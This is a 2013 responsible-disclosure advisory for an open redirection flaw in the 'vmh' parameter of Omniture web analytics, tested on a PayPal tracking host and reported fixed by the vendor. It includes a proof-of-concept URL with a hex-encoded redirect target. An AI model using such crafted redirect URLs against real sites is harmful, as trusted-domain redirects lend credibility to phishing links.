Advisory:		Omniture web analytics - Open Redirection vulnerability
Advisory ID:		SSCHADV2013-003
Author:			Stefan Schurtz
Affected Software:	Successfully tested on paypal.112.2o7.net
Vendor URL:		http://www.omniture.com/
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

The 'vmh'-Parameter in Omniture web analytics is prone to a Open Redirection vulnerability.

==========================
PoC-Exploit
==========================

// Redirection to darksecurity.de (Hex: %77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65)

http://paypal.112.2o7.net/b/ss/paypalglobal/1/H.24.2/s44689267192652?AQB=1&pccr=true&g=none&&vmh=%77%77%77%2E%64%61%72%6B%73%65%63%75%72%69%74%79%2E%64%65&ndh=1&vmt=51437A79&ce=UTF-8&cc=USD&v5=DE&c6=9WG20829AV167542H&c7=premier&v7=premier:verified:unrestricted&c8=verified&c9=unrestricted&c10=de&v19=premier&c20=1360528993&c26=submit.x&&c35=in&c40=a0df0db936e73&c43=log%20in&c47=D=pageName&c50=de_de&&c54=100&c56=no&s=1440x900&c=24&j=1.7&v=Y&k=Y&bw=1440&bh=675&&pid=log%20in&pidt=1&oid=Einloggen&oidt=3&ot=SUBMIT&AQE=1

==========================
Solution
==========================

Fixed by vendor

==========================
Disclosure Timeline
==========================

19-Feb-2013 - informed by contact form
02-Mar-2013 - vendor informed by e-mail
04-Mar-2013 - feedback from vendor
04-Mar-2013 - sent detailed information to vendor
06-Mar-2013 - feedback from Adobe PRSIRT (Adobe Product Security Incident Response Team)
29-Apr-2013 - asking about the current status
02-May-2013 - feedback from Adobe PRSIRT (Adobe Product Security Incident Response Team)

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.omniture.com/de/privacy/2o7
http://www.darksecurity.de/advisories/2013/SSCHADV2013-003.txt